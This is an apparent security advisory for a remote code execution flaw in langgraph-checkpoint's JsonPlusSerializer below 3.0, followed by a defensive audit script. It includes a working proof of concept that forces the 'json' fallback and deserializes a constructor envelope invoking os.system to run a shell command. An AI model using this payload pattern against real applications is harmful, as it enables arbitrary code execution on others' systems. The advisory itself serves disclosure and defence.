## Vulnerability Overview

### Vulnerability Name

RCE in "json" mode of JsonPlusSerializer

### Affected Versions

langgraph-checkpoint < 3.0

### Vulnerability Description

Prior to version 3.0, JsonPlusSerializer in langgraph-checkpoint had a Remote Code Execution (RCE) vulnerability in its "json" serialization mode when deserializing saved payloads. If an attacker can cause the application to save a malicious payload in "json" serialization mode, arbitrary Python code can be executed during deserialization.

### Vulnerability Details

Affected file: jsonplus.py

When serialization with "msgpack" fails, the system falls back to "json" mode. If an attacker can trigger this fallback mode with a malicious payload, deserialization will allow execution of arbitrary functions.

### Affected Users

All users of langgraph-checkpoint versions below 3.0 who:

1. Allow untrusted or user-supplied data to be saved as checkpoints.
2. Use the default serializer or JsonPlusSerializer that may fall back to "json" mode.

### Fixed Version

langgraph-checkpoint 3.0.0

### Proof of Concept (PoC)

```python
from typing import TypedDict

from langgraph.checkpoint.sqlite import SqliteSaver
from langgraph.graph import StateGraph


class State(TypedDict):
    foo: str
    attack: dict


def my_node(state: State):
    # The lone surrogate makes "msgpack" serialization fail,
    # which triggers the fallback to "json" mode.
    return {"foo": "oops i fetched a surrogate \ud800"}


with SqliteSaver.from_conn_string("foo.db") as saver:
    graph = (
        StateGraph(State)
        .add_node("my_node", my_node)
        .add_edge("__start__", "my_node")
        .compile(checkpointer=saver)
    )

    # User-supplied state shaped like a serialized constructor reference.
    attack = {
        "lc": 2,
        "type": "constructor",
        "id": ["os", "system"],
        "kwargs": {"command": "echo pwned > /tmp/pwned"},
    }
    malicious_payload = {
        "attack": attack,
    }

    thread_id = "00000000-0000-0000-0000-000000000001"
    config = {"thread_id": thread_id}

    # First call saves the payload as a checkpoint in "json" mode.
    graph.invoke(malicious_payload, config=config)
    # Second call loads that checkpoint, which deserializes the payload.
    graph.invoke({"foo": "hi there"}, config=config)
```

Running this PoC will write a file `/tmp/pwned` to disk, demonstrating code execution.

### Fix Details

Introduced a whitelist for constructor deserialization, restricting allowed "id" paths to only those module/class combinations explicitly approved during serialization.

### Mitigation

Immediately upgrade to langgraph-checkpoint==3.0.0.
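
The allowlist idea from the fix can also be applied as an audit over checkpoints that were saved before upgrading. The following is an added example, not langgraph-checkpoint's own code: the function names, the allowlist entries and the sample blob are assumptions made for illustration, and it assumes you have already extracted a "json"-mode checkpoint blob as JSON text.

```python
import json
from typing import Any, Iterator

# Assumption: illustrative allowlist, not the list shipped in langgraph-checkpoint 3.0.0.
ALLOWED_IDS = {("datetime", "timedelta"), ("uuid", "UUID")}


def iter_constructors(node: Any, path: str = "$") -> Iterator[tuple[str, tuple[str, ...]]]:
    """Yield (json_path, id_tuple) for every constructor envelope in decoded JSON."""
    if isinstance(node, dict):
        if node.get("lc") == 2 and node.get("type") == "constructor":
            raw_id = node.get("id")
            # A malformed "id" (not a list) is kept as a single element so it is still reported.
            if isinstance(raw_id, list):
                ident = tuple(str(part) for part in raw_id)
            else:
                ident = (str(raw_id),)
            yield path, ident
        # Keep descending: an envelope can be nested inside another one's kwargs.
        for key, value in node.items():
            yield from iter_constructors(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_constructors(value, f"{path}[{index}]")


def audit_checkpoint(blob: str, allowed=ALLOWED_IDS) -> list[tuple[str, str]]:
    """Return (json_path, dotted_id) for constructor ids that are not on the allowlist."""
    doc = json.loads(blob)
    return [
        (path, ".".join(ident))
        for path, ident in iter_constructors(doc)
        if ident not in allowed
    ]


# Constructed sample mirroring the state shape used in the PoC above.
SAMPLE = json.dumps({
    "foo": "hi there",
    "attack": {"lc": 2, "type": "constructor", "id": ["os", "system"],
               "kwargs": {"command": "echo pwned"}},
    "when": {"lc": 2, "type": "constructor", "id": ["datetime", "timedelta"],
             "kwargs": {"days": 1}},
})

if __name__ == "__main__":
    for path, dotted in audit_checkpoint(SAMPLE):
        print(f"unapproved constructor {dotted} at {path}")
```

Any hit means a stored checkpoint would have asked the pre-3.0 deserializer to import and call something outside the approved set, so the affected thread should be reviewed before it is loaded again.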